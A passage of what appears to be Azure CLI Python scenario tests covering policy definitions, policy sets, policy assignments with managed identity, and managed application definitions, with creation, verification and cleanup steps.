        # create a policy assignment using a built in policy definition name
        self.kwargs['pan2'] = self.create_random_name('azurecli-test-policy-assignment2', 40)
        self.kwargs['bip'] = '06a78e20-9358-41c9-923c-fb736d382a4d'
        self.cmd('policy assignment create --policy {bip} -n {pan2} --display-name {padn} -g {rg}', checks=[
            self.check('name', '{pan2}'),
            self.check('displayName', '{padn}')
        ])
        self.cmd('policy assignment delete -n {pan2} -g {rg}')
        # listing at subscription level won't find the assignment made at a resource group
        import jmespath
        try:
            self.cmd('policy assignment list', checks=self.check("length([?name=='{pan}'])", 0))
        except jmespath.exceptions.JMESPathTypeError:  # ok if query fails on None result
            pass
        # but enable --show-all works
        self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 1))
        # delete the assignment and validate it's gone
        self.cmd('policy assignment delete -n {pan} -g {rg}')
        self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))
def applyPolicyAtScope(self, scope, policyId, enforcementMode='Default'):
    """Create, list and delete a policy assignment at an arbitrary scope.

    :param scope: full resource id of the scope (subscription or management group).
    :param policyId: full resource id of the policy definition to assign.
    :param enforcementMode: 'Default' or 'DoNotEnforce'.
    """
    # create a policy assignment at the given scope
    self.kwargs.update({
        'pol': policyId,
        'pan': self.create_random_name('cli-test-polassg', 24),   # limit is 24 characters at MG scope
        'padn': self.create_random_name('test_assignment', 20),
        'scope': scope,
        'em': enforcementMode
    })

    self.cmd('policy assignment create --policy {pol} -n {pan} --display-name {padn} --params "{params}" --scope {scope} --enforcement-mode {em}', checks=[
        self.check('name', '{pan}'),
        self.check('displayName', '{padn}'),
        self.check('sku.name', 'A0'),
        self.check('sku.tier', 'Free'),
        self.check('enforcementMode', '{em}')
    ])

    # ensure the policy assignment shows up in the list result
    self.cmd('policy assignment list --scope {scope}', checks=self.check("length([?name=='{pan}'])", 1))

    # delete the assignment and validate it's gone
    self.cmd('policy assignment delete -n {pan} --scope {scope}')
    self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))
def resource_policy_operations(self, resource_group, management_group=None, subscription=None):
    """Exercise the full policy definition lifecycle (create/update/list/show/delete).

    Runs at resource group scope by default; supply management_group or
    subscription to exercise the corresponding scope instead. Also applies
    and removes a policy assignment via the applyPolicy* helpers.
    """
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    self.kwargs.update({
        'pn': self.create_random_name('azure-cli-test-policy', 30),
        'pdn': self.create_random_name('test_policy', 20),
        'desc': 'desc_for_test_policy_123',
        # backslashes are doubled so the paths survive command-string formatting on Windows
        'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
        'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
        'params': os.path.join(curr_dir, 'sample_policy_param.json').replace('\\', '\\\\'),
        'mode': 'Indexed',
        'metadata': 'test',
        'updated_metadata': 'test2',
    })
    if (management_group):
        self.kwargs.update({'mg': management_group})
    if (subscription):
        self.kwargs.update({'sub': subscription})

    # create a policy
    cmd = self.cmdstring('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc} --mode {mode} --metadata category={metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('name', '{pn}'),
        self.check('displayName', '{pdn}'),
        self.check('description', '{desc}'),
        self.check('mode', '{mode}'),
        self.check('metadata.category', '{metadata}')
    ])

    # update it
    self.kwargs['desc'] = self.kwargs['desc'] + '_new'
    self.kwargs['pdn'] = self.kwargs['pdn'] + '_new'
    cmd = self.cmdstring('policy definition update -n {pn} --description {desc} --display-name {pdn} --metadata category={updated_metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('description', '{desc}'),
        self.check('displayName', '{pdn}'),
        self.check('metadata.category', '{updated_metadata}')
    ])

    # update it with new parameters and a new rule
    self.kwargs['pdf'] = os.path.join(curr_dir, 'sample_policy_param_def_2.json').replace('\\', '\\\\')
    self.kwargs['rf'] = os.path.join(curr_dir, 'sample_policy_rule_2.json').replace('\\', '\\\\')
    cmd = self.cmdstring('policy definition update -n {pn} --description {desc} --display-name {pdn} --metadata category=test2 --params "{pdf}" --rules "{rf}"', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('description', '{desc}'),
        self.check('displayName', '{pdn}'),
        self.check('metadata.category', '{updated_metadata}'),
        self.check('parameters.allowedLocations.metadata.displayName', 'Allowed locations 2'),
        self.check('policyRule.then.effect', 'audit')
    ])

    # list and show it
    cmd = self.cmdstring('policy definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 1))
    cmd = self.cmdstring('policy definition show -n {pn}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('name', '{pn}'),
        self.check('displayName', '{pdn}')
    ])

    # apply assignments
    if management_group:
        scope = '/providers/Microsoft.Management/managementGroups/{mg}'.format(mg=management_group)
        policy = '{scope}/providers/Microsoft.Authorization/policyDefinitions/{pn}'.format(pn=self.kwargs['pn'], scope=scope)
        self.applyPolicyAtScope(scope, policy)
    elif subscription:
        policy = '/subscriptions/{sub}/providers/Microsoft.Authorization/policyDefinitions/{pn}'.format(sub=subscription, pn=self.kwargs['pn'])
        self.applyPolicyAtScope('/subscriptions/{sub}'.format(sub=subscription), policy, 'DoNotEnforce')
    else:
        self.applyPolicy()

    # delete the policy
    cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)  # ensure the policy is gone when run live.

    cmd = self.cmdstring('policy definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
def resource_policyset_operations(self, resource_group, management_group=None, subscription=None):
    """Exercise the policy set-definition lifecycle (create/update/list/show/delete).

    Creates a regular policy and a data policy, composes them into a policy
    set, assigns the set (resource group scope only), then repeats with a
    parameterized set, cleaning everything up at the end. Supply
    management_group or subscription to run at those scopes instead.
    """
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    self.kwargs.update({
        'pn': self.create_random_name('azure-cli-test-policy', 30),
        'pdn': self.create_random_name('test_policy', 20),
        'desc': 'desc_for_test_policy_123',
        'dpn': self.create_random_name('azure-cli-test-data-policy', 30),
        'dpdn': self.create_random_name('test_data_policy', 20),
        'dp_desc': 'desc_for_test_data_policy_123',
        'dp_mode': 'Microsoft.DataCatalog.Data',
        'psn': self.create_random_name('azure-cli-test-policyset', 30),
        'psdn': self.create_random_name('test_policyset', 20),
        'ps_desc': 'desc_for_test_policyset_123',
        # backslashes are doubled so the paths survive command-string formatting on Windows
        'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
        'dprf': os.path.join(curr_dir, 'sample_data_policy_rule.json').replace('\\', '\\\\'),
        'psf': os.path.join(curr_dir, 'sample_policy_set.json').replace('\\', '\\\\'),
        'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
        'metadata': 'test',
        'updated_metadata': 'test2',
    })
    if (management_group):
        self.kwargs.update({'mg': management_group})
    if (subscription):
        self.kwargs.update({'sub': subscription})

    # NOTE(review): presumably allows prior operations to settle when run live — confirm
    time.sleep(60)

    # create a policy
    cmd = self.cmdstring('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc}', management_group, subscription)
    policy = self.cmd(cmd).get_output_in_json()

    # create a data policy
    cmd = self.cmdstring('policy definition create -n {dpn} --rules "{dprf}" --mode {dp_mode} --display-name {dpdn} --description {dp_desc}', management_group, subscription)
    datapolicy = self.cmd(cmd).get_output_in_json()

    # create a policy set
    # rewrite the sample set file in place so it references the ids just created
    policyset = get_file_json(self.kwargs['psf'])
    policyset[0]['policyDefinitionId'] = policy['id']
    policyset[1]['policyDefinitionId'] = datapolicy['id']
    with open(os.path.join(curr_dir, 'sample_policy_set.json'), 'w') as outfile:
        json.dump(policyset, outfile)

    cmd = self.cmdstring('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --description {ps_desc} --metadata category={metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('name', '{psn}'),
        self.check('displayName', '{psdn}'),
        self.check('description', '{ps_desc}'),
        self.check('metadata.category', '{metadata}')
    ])

    # update it
    self.kwargs['ps_desc'] = self.kwargs['ps_desc'] + '_new'
    self.kwargs['psdn'] = self.kwargs['psdn'] + '_new'
    cmd = self.cmdstring('policy set-definition update -n {psn} --display-name {psdn} --description {ps_desc} --metadata category={updated_metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('description', '{ps_desc}'),
        self.check('displayName', '{psdn}'),
        self.check('metadata.category', '{updated_metadata}')
    ])

    # list and show it
    cmd = self.cmdstring('policy set-definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 1))
    cmd = self.cmdstring('policy set-definition show -n {psn}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('name', '{psn}'),
        self.check('displayName', '{psdn}')
    ])

    # create a policy assignment on a resource group
    if not management_group and not subscription:
        self.kwargs.update({
            'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
            'padn': self.create_random_name('test_assignment', 20)
        })

        self.cmd('policy assignment create -d {psn} -n {pan} --display-name {padn} -g {rg}', checks=[
            self.check('name', '{pan}'),
            self.check('displayName', '{padn}'),
            self.check('sku.name', 'A0'),
            self.check('sku.tier', 'Free'),
        ])

        # ensure the assignment appears in the list results
        self.cmd('policy assignment list --resource-group {rg}', checks=self.check("length([?name=='{pan}'])", 1))

        # delete the assignment and validate it's gone
        self.cmd('policy assignment delete -n {pan} -g {rg}')
        self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))

    # delete the policy set
    cmd = self.cmdstring('policy set-definition delete -n {psn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)  # ensure the policy is gone when run live.

    cmd = self.cmdstring('policy set-definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 0))

    # create a parameterized policy set
    self.kwargs['psf'] = os.path.join(curr_dir, 'sample_policy_set_parameterized.json').replace('\\', '\\\\')
    policyset = get_file_json(self.kwargs['psf'])
    policyset[0]['policyDefinitionId'] = policy['id']
    policyset[1]['policyDefinitionId'] = datapolicy['id']
    with open(os.path.join(curr_dir, 'sample_policy_set_parameterized.json'), 'w') as outfile:
        json.dump(policyset, outfile)

    cmd = self.cmdstring('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --description {ps_desc} --params "{pdf}" --metadata category={updated_metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('name', '{psn}'),
        self.check('displayName', '{psdn}'),
        self.check('description', '{ps_desc}'),
        self.check('policyDefinitions[0].parameters.allowedLocations.value', "[parameters('allowedLocations')]"),
        self.check('parameters.allowedLocations.type', 'Array'),
        self.check('metadata.category', '{updated_metadata}')
    ])

    # update the parameters on the policy set
    self.kwargs['pdf'] = os.path.join(curr_dir, 'sample_policy_param_def_2.json').replace('\\', '\\\\')
    cmd = self.cmdstring('policy set-definition update -n {psn} --params "{pdf}" --metadata category={updated_metadata}', management_group, subscription)
    self.cmd(cmd, checks=[
        self.check('parameters.allowedLocations.metadata.displayName', 'Allowed locations 2'),
        self.check('metadata.category', '{updated_metadata}')
    ])

    # delete the parameterized policy set
    cmd = self.cmdstring('policy set-definition delete -n {psn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)  # ensure the policy is gone when run live.

    cmd = self.cmdstring('policy set-definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 0))

    # delete the policy
    cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)

    # delete the data policy
    cmd = self.cmdstring('policy definition delete -n {dpn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)

    # ensure the policy is gone when run live.
    cmd = self.cmdstring('policy definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
    self.cmd(cmd, checks=self.check("length([?name=='{dpn}'])", 0))
@ResourceGroupPreparer(name_prefix='cli_test_policy')
@AllowLargeResponse(8192)
def test_resource_policy_default(self, resource_group):
    """Run the policy definition scenario at the default (resource group) scope."""
    self.resource_policy_operations(resource_group)
@ResourceGroupPreparer(name_prefix='cli_test_policy_identity')
@AllowLargeResponse(8192)
def test_resource_policy_identity(self, resource_group, resource_group_location):
    """Verify the managed identity lifecycle on policy assignments.

    Covers --assign-identity at creation, the 'policy assignment identity'
    show/assign/remove commands, and role assignment creation for the
    identity via --identity-scope/--role.
    """
    self.kwargs.update({
        'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
        'bip': '06a78e20-9358-41c9-923c-fb736d382a4d',
        'sub': self.get_subscription_id(),
        'location': resource_group_location,
        'em': 'DoNotEnforce'
    })

    # a bogus policy reference must fail before any identity work happens
    with self.assertRaises(IncorrectUsageError):
        self.cmd('policy assignment create --policy \'test/error_policy\' -n {pan} -g {rg} --location {location} --assign-identity --enforcement-mode {em}')

    # create a policy assignment with managed identity using a built in policy definition
    assignmentIdentity = self.cmd('policy assignment create --policy {bip} -n {pan} -g {rg} --location {location} --assign-identity --enforcement-mode {em}', checks=[
        self.check('name', '{pan}'),
        self.check('location', '{location}'),
        self.check('identity.type', 'SystemAssigned'),
        self.exists('identity.principalId'),
        self.exists('identity.tenantId')
    ]).get_output_in_json()['identity']

    # ensure managed identity details are retrievable directly through 'policy assignment identity' commands
    self.cmd('policy assignment identity show -n {pan} -g {rg}', checks=[
        self.check('type', assignmentIdentity['type']),
        self.check('principalId', assignmentIdentity['principalId']),
        self.check('tenantId', assignmentIdentity['tenantId'])
    ])

    # remove the managed identity and ensure it is removed when retrieving the policy assignment
    self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
        self.check('type', 'None')
    ])
    self.cmd('policy assignment show -n {pan} -g {rg}', checks=[
        self.check('name', '{pan}'),
        self.check('identity.type', 'None')
    ])

    # add an identity using 'identity assign'
    self.cmd('policy assignment identity assign -n {pan} -g {rg}', checks=[
        self.check('type', 'SystemAssigned'),
        self.exists('principalId'),
        self.exists('tenantId')
    ])
    self.cmd('policy assignment show -n {pan} -g {rg}', checks=[
        self.check('name', '{pan}'),
        self.check('identity.type', 'SystemAssigned'),
        self.exists('identity.principalId'),
        self.exists('identity.tenantId')
    ])

    self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
        self.check('type', 'None')
    ])

    # create a role assignment for the identity using --assign-identity
    self.kwargs.update({
        'idScope': '/subscriptions/{sub}/resourceGroups/{rg}'.format(**self.kwargs),
        'idRole': 'Reader'
    })
    # patch guid generation so the role assignment name is deterministic for recording
    with mock.patch('azure.cli.core.commands.arm._gen_guid', side_effect=self.create_guid):
        assignmentIdentity = self.cmd('policy assignment create --policy {bip} -n {pan} -g {rg} --location {location} --assign-identity --identity-scope {idScope} --role {idRole}', checks=[
            self.check('name', '{pan}'),
            self.check('location', '{location}'),
            self.check('identity.type', 'SystemAssigned'),
            self.exists('identity.principalId'),
            self.exists('identity.tenantId')
        ]).get_output_in_json()['identity']

    self.kwargs['principalId'] = assignmentIdentity['principalId']
    self.cmd('role assignment list --resource-group {rg} --role {idRole}', checks=[
        self.check("length([?principalId == '{principalId}'])", 1),
        self.check("[?principalId == '{principalId}'].roleDefinitionName | [0]", '{idRole}')
    ])
    self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
        self.check('type', 'None')
    ])

    # create a role assignment for the identity using 'identity assign'
    with mock.patch('azure.cli.core.commands.arm._gen_guid', side_effect=self.create_guid):
        assignmentIdentity = self.cmd('policy assignment identity assign -n {pan} -g {rg} --identity-scope {idScope} --role {idRole}', checks=[
            self.check('type', 'SystemAssigned'),
            self.exists('principalId'),
            self.exists('tenantId')
        ]).get_output_in_json()

    self.kwargs['principalId'] = assignmentIdentity['principalId']
    self.cmd('role assignment list --resource-group {rg} --role {idRole}', checks=[
        self.check("length([?principalId == '{principalId}'])", 1),
        self.check("[?principalId == '{principalId}'].roleDefinitionName | [0]", '{idRole}')
    ])

    self.cmd('policy assignment delete -n {pan} -g {rg}')
@ResourceGroupPreparer(name_prefix='cli_test_policy_management_group')
@AllowLargeResponse(4096)
def test_resource_policy_management_group(self, resource_group):
    """Run the policy scenario at management group scope, then tear the group down."""
    management_group_name = self.create_random_name('cli-test-mgmt-group', 30)
    self.cmd('account management-group create -n ' + management_group_name)
    try:
        self.resource_policy_operations(resource_group, management_group_name)

        # Attempt to get a policy definition at an invalid management group scope
        with self.assertRaises(SystemExit):
            self.cmd(self.cmdstring('policy definition show -n "/providers/microsoft.management/managementgroups/myMg/providers/microsoft.authorization/missingsegment"'))
    finally:
        # always delete the management group, even if the scenario failed
        self.cmd('account management-group delete -n ' + management_group_name)
@record_only()
@unittest.skip('mock doesnt work when the subscription comes from --scope')
@ResourceGroupPreparer(name_prefix='cli_test_policy_subscription_id')
@AllowLargeResponse()
def test_resource_policy_subscription_id(self, resource_group):
    """Run the policy scenario against an explicit subscription id."""
    # under playback, we mock it so the subscription id will be '00000000...' and it will match
    # the same sanitized value in the recording
    if not self.in_recording:
        with mock.patch('azure.cli.command_modules.resource.custom._get_subscription_id_from_subscription',
                        return_value=MOCKED_SUBSCRIPTION_ID):
            self.resource_policy_operations(resource_group, None, 'f67cc918-f64f-4c3f-aa24-a855465f9d41')
    else:
        self.resource_policy_operations(resource_group, None, 'f67cc918-f64f-4c3f-aa24-a855465f9d41')
@ResourceGroupPreparer(name_prefix='cli_test_policyset')
@AllowLargeResponse(4096)
def test_resource_policyset_default(self, resource_group):
    """Run the policy set-definition scenario at the default (resource group) scope."""
    self.resource_policyset_operations(resource_group)
@ResourceGroupPreparer(name_prefix='cli_test_policyset_management_group')
@AllowLargeResponse(4096)
def test_resource_policyset_management_group(self, resource_group):
    """Run the policy set-definition scenario at management group scope, then tear the group down."""
    management_group_name = self.create_random_name('cli-test-mgmt-group', 30)
    self.cmd('account management-group create -n ' + management_group_name)
    try:
        self.resource_policyset_operations(resource_group, management_group_name)
    finally:
        # always delete the management group, even if the scenario failed
        self.cmd('account management-group delete -n ' + management_group_name)
@record_only()
@ResourceGroupPreparer(name_prefix='cli_test_policyset_subscription_id')
@AllowLargeResponse(4096)
def test_resource_policyset_subscription_id(self, resource_group):
    """Run the policy set-definition scenario against an explicit subscription id."""
    # under playback, we mock it so the subscription id will be '00000000...' and it will match
    # the same sanitized value in the recording
    if not self.in_recording:
        with mock.patch('azure.cli.command_modules.resource.custom._get_subscription_id_from_subscription',
                        return_value=MOCKED_SUBSCRIPTION_ID):
            self.resource_policyset_operations(resource_group, None, '0b1f6471-1bf0-4dda-aec3-cb9272f09590')
    else:
        self.resource_policyset_operations(resource_group, None, '0b1f6471-1bf0-4dda-aec3-cb9272f09590')
@ResourceGroupPreparer(name_prefix='cli_test_policyset_grouping')
@AllowLargeResponse(4096)
def test_resource_policyset_grouping(self, resource_group):
    """Verify policy definition groups on a policy set-definition.

    Creates a set whose definitions reference named groups, updates the
    group metadata via --definition-groups, then cleans up.
    """
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    self.kwargs.update({
        'pn': self.create_random_name('azure-cli-test-policy', 30),
        'pdn': self.create_random_name('test_policy', 20),
        'psn': self.create_random_name('azure-cli-test-policyset', 30),
        'psdn': self.create_random_name('test_policyset', 20),
        'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
        'psf': os.path.join(curr_dir, 'sample_policy_set_grouping.json').replace('\\', '\\\\'),
        'pgf': os.path.join(curr_dir, 'sample_policy_groups_def.json').replace('\\', '\\\\'),
        'pgf2': os.path.join(curr_dir, 'sample_policy_groups_def2.json').replace('\\', '\\\\'),
        'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\')
    })

    # create a policy
    policy = self.cmd('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn}').get_output_in_json()

    # create a policy set
    # rewrite the sample set file in place so both entries reference the id just created
    policyset = get_file_json(self.kwargs['psf'])
    policyset[0]['policyDefinitionId'] = policy['id']
    policyset[1]['policyDefinitionId'] = policy['id']
    with open(os.path.join(curr_dir, 'sample_policy_set_grouping.json'), 'w') as outfile:
        json.dump(policyset, outfile)

    self.cmd('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --definition-groups @"{pgf}"', checks=[
        self.check('name', '{psn}'),
        self.check('displayName', '{psdn}'),
        self.check('length(policyDefinitionGroups)', 2),
        self.check("length(policyDefinitionGroups[?name=='group1'])", 1),
        self.check("length(policyDefinitionGroups[?name=='group2'])", 1),
        self.check('length(policyDefinitions[0].groupNames)', 2),
        self.check('length(policyDefinitions[1].groupNames)', 1)
    ])

    # update the groups
    groups = get_file_json(self.kwargs['pgf'])
    groups[0]['displayName'] = "Updated display name"
    with open(os.path.join(curr_dir, 'sample_policy_groups_def2.json'), 'w') as outfile:
        json.dump(groups, outfile)

    self.cmd('policy set-definition update -n {psn} --definition-groups @"{pgf2}"', checks=[
        self.check('length(policyDefinitionGroups)', 2),
        self.check("length(policyDefinitionGroups[?name=='group1'])", 1),
        self.check("length(policyDefinitionGroups[?name=='group2'])", 1),
        self.check("length(policyDefinitionGroups[?displayName=='Updated display name\'])", 1)
    ])

    # show it
    self.cmd('policy set-definition show -n {psn}',
             checks=self.check('length(policyDefinitionGroups)', 2))

    # delete the policy set
    self.cmd('policy set-definition delete -n {psn}')
    time.sleep(10)  # ensure the policy is gone when run live.

    self.cmd('policy set-definition list',
             checks=self.check("length([?name=='{psn}'])", 0))

    # delete the policy
    self.cmd('policy definition delete -n {pn}')
@AllowLargeResponse(8192)
def test_show_built_in_policy(self):
    """For every built-in policy definition, verify 'show' returns matching details.

    Lists all definitions with policyType == 'BuiltIn', then retrieves each
    one by name and checks that name, description, display name and id agree
    with the listing.
    """
    # get the list of builtins, then retrieve each via show and validate the results match
    results = self.cmd('policy definition list --query "[?policyType==\'BuiltIn\']"').get_output_in_json()
    # plain iteration: the previous enumerate() index was never used
    for result in results:
        self.kwargs['pn'] = result['name']
        self.kwargs['dn'] = result['displayName']
        self.kwargs['desc'] = result['description']
        self.kwargs['id'] = result['id']
        self.cmd('policy definition show -n {pn}', checks=[
            self.check('name', '{pn}'),
            self.check('description', '{desc}'),
            self.check('displayName', '{dn}'),
            self.check('id', '{id}')
        ])
# Because the policy assignment name is generated randomly and automatically, the value of each run is different,
# so it cannot be rerecord.
@ResourceGroupPreparer(name_prefix='cli_test_resource_create_policy_assignment_random')
@AllowLargeResponse(4096)
@live_only()
def test_resource_create_policy_assignment_random(self, resource_group, management_group=None, subscription=None):
    """Create a policy assignment without -n so the service generates its name, then clean up."""
    curr_dir = os.path.dirname(os.path.realpath(__file__))
    self.kwargs.update({
        'pn': self.create_random_name('azure-cli-test-policy', 30),
        'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
        'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
        'pdn': self.create_random_name('test_policy', 20),
        'desc': 'desc_for_test_policy_123',
        'padn': self.create_random_name('test_assignment', 20),
        'params': os.path.join(curr_dir, 'sample_policy_param.json').replace('\\', '\\\\')
    })

    # BUG FIX: the original passed management_group/subscription positionally to
    # self.cmd(), where they landed in its 'checks'/'expect_failure' parameters
    # (harmless only because both default to None). Route them through
    # cmdstring() like every other helper in this class.
    cmd = self.cmdstring('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc}', management_group, subscription)
    self.cmd(cmd)

    # omit -n so the service generates the assignment name; capture it for cleanup
    self.kwargs['pan_random'] = self.cmd('policy assignment create --policy {pn} --display-name {padn} -g {rg} --params "{params}"', checks=[
        self.check('displayName', '{padn}'),
        self.check('sku.name', 'A0'),
        self.check('sku.tier', 'Free'),
    ]).get_output_in_json()['name']

    # clean policy assignment and policy
    self.cmd('policy assignment delete -n {pan_random} -g {rg}')
    self.cmd('policy assignment list --disable-scope-strict-match',
             checks=self.check("length([?name=='{pan_random}'])", 0))
    cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
    self.cmd(cmd)
    time.sleep(10)

    cmd = self.cmdstring('policy definition list', management_group, subscription)
    self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
class ManagedAppDefinitionScenarioTest(ScenarioTest):
    """Tests for 'az managedapp definition' create/list/show/delete."""

    @AllowLargeResponse()
    @ResourceGroupPreparer()
    def test_managedappdef(self, resource_group):
        """Create a managed app definition from a package file URI and verify it round-trips."""
        self.kwargs.update({
            'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
            'sub': self.get_subscription_id()
        })

        user_principal = self.cmd(
            'ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
        time.sleep(15)  # By-design, it takes some time for RBAC system propagated with graph object change
        principal_id = user_principal['objectId']

        # deterministic guids so the role assignment can be recorded/played back
        with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
            role_assignment = self.cmd(
                'role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
        from msrestazure.tools import parse_resource_id
        role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']

        self.kwargs.update({
            'loc': 'eastus',
            'adn': self.create_random_name('testappdefname', 20),
            'addn': self.create_random_name('test_appdef', 20),
            'ad_desc': 'test_appdef_123',
            'uri': 'https://raw.githubusercontent.com/Azure/azure-managedapp-samples/master/Managed%20Application%20Sample%20Packages/201-managed-storage-account/managedstorage.zip',
            # authorization is '<principal id>:<role definition id>'
            'auth': principal_id + ':' + role_definition_id,
            'lock': 'None'
        })

        # create a managedapp definition
        self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --package-file-uri {uri} --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}', checks=[
            self.check('name', '{adn}'),
            self.check('displayName', '{addn}'),
            self.check('description', '{ad_desc}'),
            self.check('authorizations[0].principalId', principal_id),
            self.check('authorizations[0].roleDefinitionId', role_definition_id),
            self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
            self.check('artifacts[0].type', 'Template'),
            self.check('artifacts[1].name', 'CreateUiDefinition'),
            self.check('artifacts[1].type', 'Custom')
        ]).get_output_in_json()['id']

        self.cmd('managedapp definition list -g {rg}',
                 checks=self.check('[0].name', '{adn}'))

        self.cmd('managedapp definition show --ids {ad_id}', checks=[
            self.check('name', '{adn}'),
            self.check('displayName', '{addn}'),
            self.check('description', '{ad_desc}'),
            self.check('authorizations[0].principalId', principal_id),
            self.check('authorizations[0].roleDefinitionId', role_definition_id),
            self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
            self.check('artifacts[0].type', 'Template'),
            self.check('artifacts[1].name', 'CreateUiDefinition'),
            self.check('artifacts[1].type', 'Custom')
        ])

        self.cmd('managedapp definition delete -g {rg} -n {adn}')
        self.cmd('managedapp definition list -g {rg}', checks=self.is_empty())

        # clean up the temporary test user and its role assignment
        self.cmd('role assignment delete --assignee {upn} --role contributor ')
        self.cmd('ad user delete --upn-or-object-id {upn}')

    @AllowLargeResponse()
    @ResourceGroupPreparer()
    def test_managedappdef_inline(self, resource_group):
        """Create a managed app definition from inline UI-definition and main-template files."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'upn': self.create_random_name('testuser', 15) + '@azuresdkteam.onmicrosoft.com',
            'sub': self.get_subscription_id()
        })

        user_principal = self.cmd(
            'ad user create --display-name tester123 --password Test123456789 --user-principal-name {upn}').get_output_in_json()
        time.sleep(15)  # By-design, it takes some time for RBAC system propagated with graph object change
        principal_id = user_principal['objectId']

        # deterministic guids so the role assignment can be recorded/played back
        with mock.patch('azure.cli.command_modules.role.custom._gen_guid', side_effect=self.create_guid):
            role_assignment = self.cmd(
                'role assignment create --assignee {upn} --role contributor --scope "/subscriptions/{sub}" ').get_output_in_json()
        from msrestazure.tools import parse_resource_id
        role_definition_id = parse_resource_id(role_assignment['roleDefinitionId'])['name']

        self.kwargs.update({
            'loc': 'eastus',
            'adn': self.create_random_name('testappdefname', 20),
            'addn': self.create_random_name('test_appdef', 20),
            'ad_desc': 'test_appdef_123',
            # authorization is '<principal id>:<role definition id>'
            'auth': principal_id + ':' + role_definition_id,
            'lock': 'None',
            'ui_file': os.path.join(curr_dir, 'sample_create_ui_definition.json').replace('\\', '\\\\'),
            'main_file': os.path.join(curr_dir, 'sample_main_template.json').replace('\\', '\\\\')
        })

        # create a managedapp definition with inline params for create-ui-definition and main-template
        self.kwargs['ad_id'] = self.cmd('managedapp definition create -n {adn} --create-ui-definition @"{ui_file}" --main-template @"{main_file}" --display-name {addn} --description {ad_desc} -l {loc} -a {auth} --lock-level {lock} -g {rg}', checks=[
            self.check('name', '{adn}'),
            self.check('displayName', '{addn}'),
            self.check('description', '{ad_desc}'),
            self.check('authorizations[0].principalId', principal_id),
            self.check('authorizations[0].roleDefinitionId', role_definition_id),
            self.check('artifacts[0].name', 'ApplicationResourceTemplate'),
            self.check('artifacts[0].type', 'Template'),
            self.check('artifacts[1].name', 'CreateUiDefinition'),
            self.check('artifacts[1].type', 'Custom')
        ]).get_output_in_json()['id']

        self.cmd('managedapp definition list -g {rg}',
                 checks=self.check('[0].name', '{adn}'))

        self.cmd('managedapp definition show --ids {ad_id}', checks=[
            self.check('name', '{adn}'),
            self.check('displayName', '{addn}'),
            self.check('description', '{ad_desc}'),
            self.check('authorizations[0].principalId', principal_id),
            self.check('authorizations[0].roleDefinitionId', role_definition_id),
